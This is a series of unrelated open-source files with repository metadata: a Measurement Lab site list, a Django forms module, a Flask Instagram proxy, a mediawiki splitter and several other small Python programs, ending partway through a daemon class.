53.433300, -6.250000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('fln01','200.237.203.0', '2801:80:a88:4006::', 'Florianopolis', 'BR', -27.668455, -48.545998, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('fra01','80.239.199.0', '2001:2030:2f::', 'Frankfurt', 'DE', 50.037932, 8.562151, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('fra02','77.67.114.0', '2001:668:1f:5e::', 'Frankfurt', 'DE', 50.037932, 8.562151, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('fra03','195.89.146.64', '2001:5001:200:30::', 'Frankfurt', 'DE', 50.037932, 8.562151, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('fra04','62.67.198.192', '2001:4c08:2003:40::', 'Frankfurt', 'DE', 50.037932, 8.562151, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ham02','80.239.142.192', '2001:2030:0:19::', 'Hamburg', 'DE', 53.633300, 9.983330, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), # NOTE: hnd01's arch is 'x86_64-r630', but they are actually R620s. The boot flags and CD for the R630s works for the R620s, whereas the arch 'x86_64' does not. makesite('hnd01','203.178.130.192','2001:200:0:b801::', 'Tokyo', 'JP', 35.552200, 139.780000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('hnd02','210.151.179.128','2001:260:8a::', 'Tokyo', 'JP', 35.552200, 139.780000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('iad02','38.90.140.128', '2001:550:200:7::', 'Washington_DC', 'US', 38.944400, -77.455800, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('iad03','66.198.10.128', '2001:5a0:3c03::', 'Washington_DC', 'US', 38.944400, -77.455800, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('iad04','173.205.4.0', '2001:668:1f:21::', 'Washington_DC', 'US', 38.944400, -77.455800, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('iad05','4.35.238.192', '2001:1900:2200:46::', 'Washington_DC', 'US', 38.944400, -77.455800, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('iad06','209.170.119.192','2001:2030:0:29::', 'Washington_DC', 'US', 38.944400, -77.455800, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('jnb01','196.24.45.128', '2001:4200:fff0:4512::','Johannesburg', 'ZA', -26.203500, 28.133500, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lax02','63.243.240.64', '2001:5a0:3a01::', 'Los Angeles_CA', 'US', 33.942500, -118.407200, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lax03','173.205.3.64', '2001:668:1f:1e::', 'Los Angeles_CA', 'US', 33.942500, -118.407200, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lax04','4.15.166.0', '2001:1900:2100:15::', 'Los Angeles_CA', 'US', 33.942500, -118.407200, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), 
makesite('lax05','128.177.109.192','2001:438:fffd:2e::', 'Los Angeles_CA', 'US', 33.942500, -118.407200, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lax06','38.98.51.0', '2001:550:6800::', 'Los Angeles_CA', 'US', 33.942500, -118.407200, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lga03','64.86.148.128', '2001:5a0:4300::', 'New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lga04','173.205.4.64', '2001:668:1f:22::', 'New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lga05','4.35.94.0', '2001:1900:2100:14::', 'New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lga06','128.177.119.192','2001:438:fffd:2b::', 'New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lga08','38.106.70.128', '2001:550:1d00:100::', 'New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lhr02','80.239.170.192', '2001:2030:33::', 'London', 'GB', 51.469700, -0.451389, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lhr03','77.67.114.192', '2001:668:1f:61::', 'London', 'GB', 51.469700, -0.451389, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lhr04','195.89.146.0', '2001:5000:1100:31::', 'London', 'GB', 51.469700, -0.451389, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lhr05','212.113.31.0', '2001:4c08:2003:3c::', 'London', 'GB', 51.469700, -0.451389, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lis01','213.242.96.192', '2001:4c08:2003:3d::', 'Lisbon', 'PT', 38.775600, -9.135400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lis02','195.89.147.128', '2001:500d:200:3::', 'Lisbon', 'PT', 38.775600, -9.135400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lju01','91.239.96.64', '2001:67c:27e4:100::', 'Ljubljana', 'SI', 46.223600, 14.457500, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mad02','213.242.96.128','2001:4c08:2003:3e::', 'Madrid', 'ES', 40.466700, -3.566670, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mad03','80.239.229.128','2001:2030:34::', 'Madrid', 'ES', 40.466700, -3.566670, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mad04','77.67.115.64', '2001:668:1f:63::', 'Madrid', 'ES', 40.466700, -3.566670, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mia02','38.109.21.0', '2001:550:6c01::', 'Miami_FL', 'US', 25.783300, -80.266700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mia03','66.110.73.0', '2001:5a0:3801::', 'Miami_FL', 'US', 25.783300, -80.266700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', 
roundrobin=True), makesite('mia04','173.205.3.128', '2001:668:1f:1f::', 'Miami_FL', 'US', 25.783300, -80.266700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mia05','128.177.109.0', '2001:438:fffd:29::', 'Miami_FL', 'US', 25.783300, -80.266700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mia06','4.71.210.192', '2001:1900:3001:a::', 'Miami_FL', 'US', 25.783300, -80.266700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mil02','80.239.222.0', '2001:2030:30::', 'Milan', 'IT', 45.464000, 9.191600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mil03','77.67.115.0', '2001:668:1f:62::', 'Milan', 'IT', 45.464000, 9.191600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mil04','213.242.77.128', '2001:1900:2200:af::', 'Milan', 'IT', 45.464000, 9.191600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mil05','195.89.147.0', '2001:5008:100:14::', 'Milan', 'IT', 45.464000, 9.191600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mnl01','202.90.156.0', '2001:d18:0:35::', 'Manila', 'PH', 14.5086, 121.0194, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mpm01','41.94.23.0', None, 'Maputo', 'MZ', -25.9208, 32.5725, user_list, count=4, arch='x86_64-r630', exclude=[1,2,3,4], nodegroup='MeasurementLabCentos', roundrobin=False), makesite('nbo01','197.136.0.64', '2c0f:fe08:10:64::', 'Nairobi', 'KE', -1.319170, 36.925800, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('nuq02','149.20.5.64', '2001:4f8:1:1001::', 'San Francisco Bay Area_CA', 'US', 37.383300, -122.066700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('nuq03','38.102.163.128', '2001:550:1502::', 'San Francisco Bay Area_CA', 'US', 37.383300, -122.066700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('nuq04','66.110.32.64', '2001:5a0:3e00::', 'San Francisco Bay Area_CA', 'US', 37.383300, -122.066700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('nuq06','128.177.109.128','2001:438:fffd:2d::', 'San Francisco Bay Area_CA', 'US', 37.383300, -122.066700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('nuq07','209.170.110.192','2001:2030:0:12::', 'San Francisco Bay Area_CA', 'US', 37.383300, -122.066700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ord02','38.65.210.192', '2001:550:1b01:1::', 'Chicago_IL', 'US', 41.978600, -87.904700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ord03','66.198.24.64', '2001:5a0:4200::', 'Chicago_IL', 'US', 41.978600, -87.904700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ord04','173.205.3.192', '2001:668:1f:20::', 'Chicago_IL', 'US', 41.978600, -87.904700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ord05','128.177.163.0', '2001:438:fffd:2f::', 'Chicago_IL', 'US', 41.978600, -87.904700, 
user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ord06','4.71.251.128', '2001:1900:3001:b::', 'Chicago_IL', 'US', 41.978600, -87.904700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('par02','212.73.231.192', '2001:4c08:2003:3f::', 'Paris', 'FR', 48.858400, 2.349010, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('par03','80.239.222.64', '2001:2030:35::', 'Paris', 'FR', 48.858400, 2.349010, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('par04','77.67.119.128', '2001:668:1f:6b::', 'Paris', 'FR', 48.858400, 2.349010, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('par05','195.89.147.192', '2001:5003:300:e::', 'Paris', 'FR', 48.858400, 2.349010, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('prg02','195.122.159.128','2001:4c08:2003:42::', 'Prague', 'CZ', 50.083300, 14.416700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('prg03','80.239.156.128', '2001:2030:31::', 'Prague', 'CZ', 50.083300, 14.416700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('prg04','77.67.114.128', '2001:668:1f:60::', 'Prague', 'CZ', 50.083300, 14.416700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('prg05','195.89.147.64', '2001:5016:100:3::', 'Prague', 'CZ', 50.083300, 14.416700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('sea02','63.243.224.0', '2001:5a0:4400::', 'Seattle_WA', 'US', 47.448900, -122.309400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('sea03','173.205.3.0', '2001:668:1f:1d::', 'Seattle_WA', 'US', 47.448900, -122.309400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('sea04','4.71.157.128', '2001:1900:2100:16::', 'Seattle_WA', 'US', 47.448900, -122.309400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('sea07','209.170.110.128','2001:2030:0:a::', 'Seattle_WA', 'US', 47.448900, -122.309400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('sea08','38.102.0.64', '2001:550:3200:1::', 'Seattle_WA', 'US', 47.448900, -122.309400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('sin01','180.87.97.64', '2405:2000:301::', 'Singapore', 'SG', 1.3550, 103.9880, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('svg01','81.167.39.0', '2a01:798:0:13::', 'Stavanger', 'NO', 58.876700, 5.63780, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('syd02','175.45.79.0', '2402:7800:0:12::', 'Sydney', 'AU', -33.946100, 151.177000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('syd03','203.5.76.128', '2001:388:d0::', 'Sydney', 'AU', -33.946100, 151.177000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('tgd01','213.149.127.0', '2a00:fe80:0:104::', 'Podgorica', 'ME', 42.107764, 18.761649, user_list, count=4, 
arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('tnr01','41.188.12.64', None, 'Antananarivo', 'MG', -18.7969, 47.4788, user_list, exclude=[1,2,3,4], count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('tpe01','163.22.28.0', '2001:e10:6840:28::', 'Taipei', 'TW', 25.077800, 121.224000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('trn01','194.116.85.192', '2001:7f8:23:307::', 'Turin', 'IT', 45.200800, 7.649720, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), # old ipv6 2c0f:fab0:ffff:1000:: @ tun01 makesite('tun01','41.231.21.0', '2001:4350:3000:1::', 'Tunis', 'TN', 36.851600, 10.229100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('vie01','213.208.152.0', '2a01:190:1700:38::', 'Vienna', 'AT', 48.269000, 16.410700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('wlg02','163.7.129.64', '2404:138:4009:1::', 'Wellington', 'NZ', -41.327200, 174.805000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('yqm01','209.51.169.128', '2001:470:1:820::', 'Moncton', 'CA', 46.107332, -64.673830, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('yul02','216.66.14.64', '2001:470:1:48f::', 'Montreal', 'CA', 45.4576, -73.7497, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('yvr01','184.105.70.192', '2001:470:1:822::', 'Vancouver','CA', 49.190165, -123.183665, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ywg01','184.105.55.64', '2001:470:1:81f::', 'Winnipeg', 'CA', 49.905996, -97.237332, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('yyc02','65.49.72.192', '2001:470:1:42c::', 'Calgary', 'CA', 51.1315, -114.0106, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('yyz02','216.66.68.128', '2001:470:1:70a::', 'Toronto', 'CA', 43.6767, -79.6306, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), # Site for M-Lab testing machines makesite('lga0t','4.14.159.64', '2001:1900:2100:2d::','New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lga1t','4.14.3.0', '2001:1900:2100:1::', 'New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64', nodegroup='MeasurementLabCentos', roundrobin=False), ]
m-lab/operator
plsync/sites.py
Python
apache-2.0
25,116
0.01067
# coding=utf-8
# Graded response model (GRM) from item response theory
from __future__ import division, print_function, unicode_literals
from psy import Grm, data

scores = data['lsat.dat']
grm = Grm(scores=scores)
print(grm.em())
inuyasha2012/pypsy
demo/demo_grm.py
Python
mit
220
0
# Definition for an interval.
class Interval:
    def __init__(self, s=0, e=0):
        self.start = s
        self.end = e


class Solution:
    def eraseOverlapIntervals(self, intervals):
        """
        :type intervals: List[Interval]
        :rtype: int
        """
        if not intervals:
            return 0
        intervals.sort(key=lambda i: (i.end, i.start))
        kicks = 0
        pre_end = intervals[0].end
        for it in intervals[1:]:
            if it.start < pre_end:
                kicks += 1
            else:
                pre_end = it.end
        return kicks


fn = Solution().eraseOverlapIntervals
print(fn([Interval(*it) for it in [[1, 2], [2, 3], [3, 4], [1, 3]]]))
print(fn([Interval(*it) for it in [[1, 2], [1, 2], [1, 2]]]))
print(fn([Interval(*it) for it in [[1, 2], [2, 3]]]))
feigaochn/leetcode
p435_non_overlapping_intervals.py
Python
mit
823
0
from django import forms
from django.utils.translation import ugettext_lazy as _
from django_summernote.widgets import SummernoteInplaceWidget
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit

from .models import Speaker, Program


class EmailLoginForm(forms.Form):
    email = forms.EmailField(
        max_length=255,
        label='',
        widget=forms.TextInput(attrs={
            'placeholder': 'Email address',
            'class': 'form-control',
        })
    )

    def clean(self):
        cleaned_data = super(EmailLoginForm, self).clean()
        return cleaned_data


class SpeakerForm(forms.ModelForm):
    def __init__(self, *args, **kwargs):
        super(SpeakerForm, self).__init__(*args, **kwargs)
        self.helper = FormHelper()
        self.helper.add_input(Submit('submit', _('Submit')))

    class Meta:
        model = Speaker
        fields = ('desc', 'info', )
        widgets = {
            'desc': SummernoteInplaceWidget(),
        }
        labels = {
            'desc': _('Profile'),
            'info': _('Additional information'),
        }


class ProgramForm(forms.ModelForm):
    def __init__(self, *args, **kwargs):
        super(ProgramForm, self).__init__(*args, **kwargs)
        self.helper = FormHelper()
        self.helper.add_input(Submit('submit', _('Submit')))

    class Meta:
        model = Program
        fields = ('slide_url', 'video_url', 'is_recordable', 'desc', )
        widgets = {
            'desc': SummernoteInplaceWidget(),
        }
        labels = {
            'slide_url': _('Slide URL'),
            'video_url': _('Video URL'),
            'is_recordable': _('Photography and recording is allowed'),
            'desc': _('Description'),
        }
pythonkr/pyconkr-2014
pyconkr/forms.py
Python
mit
1,760
0
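For orientation only: the model forms in the record above would typically be driven from a standard Django view. The sketch below is an assumption, not part of the original project; the view name, URL name and template path are invented.

from django.shortcuts import redirect, render

def edit_speaker_profile(request, speaker):
    # Bind POST data when present, otherwise show an unbound form for editing.
    form = SpeakerForm(request.POST or None, instance=speaker)
    if request.method == 'POST' and form.is_valid():
        form.save()
        return redirect('profile')          # hypothetical URL name
    return render(request, 'speaker_form.html', {'form': form})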
from django.db import models
from django.core.exceptions import MultipleObjectsReturned
from expedient.clearinghouse.aggregate.models import Aggregate
from expedient.common.permissions.shortcuts import must_have_permission
from vt_plugin.models.VM import VM


# Virtualization Plugin class
class VtPlugin(Aggregate):
    '''
    Virtualization Plugin that communicates the Virtualization Aggregate Manager with Expedient
    '''

    # VT Aggregate information field
    information = "An aggregate of VT servers "

    class Meta:
        app_label = 'vt_plugin'
        verbose_name = "Virtualization Aggregate"

    client = models.OneToOneField('xmlrpcServerProxy', editable = False, blank = True, null = True)

    #def start_slice(self, slice):
    #    super(VtPlugin, self).start_slice(slice)
    #    try:
    #        from vt_plugin.controller.dispatchers.GUIdispatcher import startStopSlice
    #        startStopSlice("start",slice.uuid)
    #    except:
    #        raise

    def stop_slice(self, slice):
        super(VtPlugin, self).stop_slice(slice)
        try:
            from vt_plugin.controller.dispatchers.GUIdispatcher import startStopSlice
            startStopSlice("stop",slice.uuid)
        except:
            raise

    """
    aggregate.remove_from_project on a VT AM will get here first to check
    that no slice inside the project contains VMs for the given aggregate
    """
    def remove_from_project(self, project, next):
        # Check permission because it won't always call parent method (where permission checks)
        must_have_permission("user", self.as_leaf_class(), "can_use_aggregate")
        vms = self.resource_set.filter_for_class(VM).filter(vm__projectId=project.uuid)
        offending_slices = []
        for vm in vms:
            offending_slices.append(str(vm.vm.getSliceName()))
        # Aggregate has VMs in slices -> stop slices and remove aggregate from there where possible
        if offending_slices:
            for slice in project.slice_set.all():
                try:
                    self.stop_slice(slice)
                    self.remove_from_slice(slice, next)
                except:
                    pass
            raise MultipleObjectsReturned("Please delete all VMs inside aggregate '%s' before removing it from slices %s" % (self.name, str(offending_slices)))
        # Aggregate has no VMs in slices (OK) -> delete completely from project (parent method)
        else:
            return super(VtPlugin, self).remove_from_project(project, next)

    """
    aggregate.remove_from_slice on a VT AM will get here first to check
    that the slice does not contain VMs for the given aggregate
    """
    def remove_from_slice(self, slice, next):
        # If any VM (created inside this slice) is found inside any server of the VT AM, warn
        if self.resource_set.filter_for_class(VM).filter(vm__sliceId=slice.uuid):
            raise MultipleObjectsReturned("Please delete all VMs inside aggregate '%s' before removing it" % str(self.name))
        return super(VtPlugin, self).remove_from_slice(slice, next)
dana-i2cat/felix
expedient/src/python/plugins/vt_plugin/models/VtPlugin.py
Python
apache-2.0
3,112
0.008676
#!/usr/bin/env python
"""Script to split a large mediawiki file into multiple files, by header."""
import sys
import re
import os

ADD_TOC = True  # Add TOC everywhere?


def usage():
    print "Usage: [scriptname] [infilename]"

if len(sys.argv) != 2:
    usage()
    exit()

filename_in = sys.argv[1]
if '.' in filename_in:
    filename_no_exts = filename_in[:filename_in.find('.')]
else:
    filename_no_exts = filename_in

# Match top-level headers only.
header = re.compile(r"^=([^=]+)=")

current_filename = ''  # Set once we see a header, hyphenated
current_filename_orig = ''  # Original.
current_text = ''  # Build up the next file to write.
file_in = open(filename_in, 'r')
header_names = []  # list of (hyphenated, orig) file name pairs
TOC_FILE = 'Home.mediawiki'  # location of intro text before headers + TOC.


def cap_firsts(s):
    s_caps = ''
    words = s.split(' ')
    for j, word in enumerate(words):
        words[j] = word[0].upper() + word[1:]
    return " ".join(words)

first = True
i = 0
for line in file_in.readlines():
    m = header.match(line)
    if m:
        assert len(m.groups()) == 1
        # dump string to file.
        if first:
            filename = TOC_FILE
            first = False
        else:
            filename = current_filename + '.mediawiki'
        f = open(filename, 'w')
        if ADD_TOC and not filename == TOC_FILE:
            f.write("__TOC__\n\n")
        f.write(current_text)
        f.close()
        current_text = ''
        # Who knows how Gollum/Mediawiki handle spaces. Convert to hyphens.
        current_filename_orig = cap_firsts(m.groups()[0].strip())
        current_filename = current_filename_orig.replace(' ', '-')
        header_names.append((current_filename, current_filename_orig))
    else:
        current_text += line
    i += 1

# Finish last file
filename = current_filename + '.mediawiki'
f = open(filename, 'w')
f.write(current_text)
f.close()

print "processed %i lines" % i

home_file = open('Home.mediawiki', 'a')
# Dump out the header names to a Home.ext to form a TOC.
for k, (hyphenated, orig) in enumerate(header_names):
    # Link | Page Title
    home_file.write("%i: [[%s|%s]]\n\n" % (k + 1, hyphenated, orig))
brandonheller/mediawiki_to_gollum
split_by_headers.py
Python
bsd-3-clause
2,218
0.002705
from flask import Flask, request, jsonify, abort
import os
import requests

app = Flask(__name__)
app.debug = os.getenv('DEBUG', '') == 'True'


def access_token():
    return os.getenv('ACCESS_TOKEN', '')


def check_user_id(user_id):
    if user_id not in os.getenv('USER_IDS', ''):
        return abort(403)


def check_user_name(user_name):
    if user_name not in os.getenv('USER_NAMES', ''):
        return abort(403)


def perform_request(path):
    r = requests.get(path)
    response = jsonify(r.json(), status=202)
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response


def build_recent_images_url(user_id):
    return 'https://api.instagram.com/v1/users/' + user_id + '/media/recent/?access_token=' + access_token()


def build_user_profile_url(user_id):
    return 'https://api.instagram.com/v1/users/' + user_id + '?access_token=' + access_token()


def build_media_url(user_name):
    return 'https://www.instagram.com/' + user_name + '/media/'


@app.route("/recent_images/<path:user_id>")
def recent_images(user_id):
    check_user_id(user_id)
    return perform_request(build_recent_images_url(user_id))


@app.route("/user_profile/<path:user_id>")
def user_profile(user_id):
    check_user_id(user_id)
    return perform_request(build_user_profile_url(user_id))


@app.route("/media/<path:user_name>")
def media(user_name):
    check_user_name(user_name)
    return perform_request(build_media_url(user_name))


@app.route('/healthcheck')
def healthcheck():
    return 'WORKING'


if __name__ == "__main__":
    app.run()
cyrilkyburz/bhwi_proxy
bhwi_proxy.py
Python
mit
1,516
0.019789
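As a reading aid for the proxy record above: the app can be exercised without deploying it by using Flask's built-in test client. This sketch assumes the file is importable as the module `bhwi_proxy` (its path above) and uses made-up environment values; only the `/healthcheck` route is hit, since the other routes would call the real Instagram API.

import os
os.environ['USER_IDS'] = '12345'            # hypothetical allowed user id
os.environ['ACCESS_TOKEN'] = 'example-token' # hypothetical token

from bhwi_proxy import app  # the __main__ guard keeps app.run() from firing on import

with app.test_client() as client:
    resp = client.get('/healthcheck')
    print(resp.status_code, resp.data)  # expected: 200 b'WORKING'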
#!/usr/bin/env python # # Copyright 2013, 2014 Free Software Foundation, Inc. # # This file is part of GNU Radio # # GNU Radio is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3, or (at your option) # any later version. # # GNU Radio is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GNU Radio; see the file COPYING. If not, write to # the Free Software Foundation, Inc., 51 Franklin Street, # Boston, MA 02110-1301, USA. # import ConfigParser import sys import os import exceptions import re class volk_fft_modtool_config: def key_val_sub(self, num, stuff, section): return re.sub('\$' + 'k' + str(num), stuff[num][0], (re.sub('\$' + str(num), stuff[num][1], section[1][num]))); def verify(self): for i in self.verification: self.verify_section(i) def remap(self): for i in self.remapification: self.verify_section(i) def verify_section(self, section): stuff = self.cfg.items(section[0]) for i in range(len(section[1])): eval(self.key_val_sub(i, stuff, section)) try: val = eval(self.key_val_sub(i, stuff, section)) if val == False: raise exceptions.ValueError except ValueError: raise exceptions.ValueError('Verification function returns False... key:%s, val:%s'%(stuff[i][0], stuff[i][1])) except: raise exceptions.IOError('bad configuration... key:%s, val:%s'%(stuff[i][0], stuff[i][1])) def __init__(self, cfg=None): self.config_name = 'config' self.config_defaults = ['name', 'destination', 'base'] self.config_defaults_remap = ['1', 'self.cfg.set(self.config_name, \'$k1\', os.path.realpath(os.path.expanduser(\'$1\')))', 'self.cfg.set(self.config_name, \'$k2\', os.path.realpath(os.path.expanduser(\'$2\')))'] self.config_defaults_verify = ['re.match(\'[a-zA-Z0-9]+$\', \'$0\')', 'os.path.exists(\'$1\')', 'os.path.exists(\'$2\')'] self.remapification = [(self.config_name, self.config_defaults_remap)] self.verification = [(self.config_name, self.config_defaults_verify)] default = os.path.join(os.getcwd(), 'volk_fft_modtool.cfg') icfg = ConfigParser.RawConfigParser() if cfg: icfg.read(cfg) elif os.path.exists(default): icfg.read(default) else: print "Initializing config file..." icfg.add_section(self.config_name) for kn in self.config_defaults: rv = raw_input("%s: "%(kn)) icfg.set(self.config_name, kn, rv) self.cfg = icfg self.remap() self.verify() def read_map(self, name, inp): if self.cfg.has_section(name): self.cfg.remove_section(name) self.cfg.add_section(name) for i in inp: self.cfg.set(name, i, inp[i]) def get_map(self, name): retval = {} stuff = self.cfg.items(name) for i in stuff: retval[i[0]] = i[1] return retval
hamgravy/volk-fft
python/volk_fft_modtool/cfg.py
Python
gpl-3.0
3,621
0.005523
import sys, os, time, atexit
from signal import SIGTERM, SIGKILL


class Daemon:
    """
    A generic daemon class.

    Usage: subclass the Daemon class and override the run() method
    """
    def __init__(self, pidfile, stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):
        self.stdin = stdin
        self.stdout = stdout
        self.stderr = stderr
        self.pidfile = pidfile

    def daemonize(self):
        """
        do the UNIX double-fork magic, see Stevens' "Advanced
        Programming in the UNIX Environment" for details (ISBN 0201563177)
        http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
        """
        try:
            pid = os.fork()
            if pid > 0:
                # exit first parent
                sys.exit(0)
        except OSError, e:
            sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
            sys.exit(1)

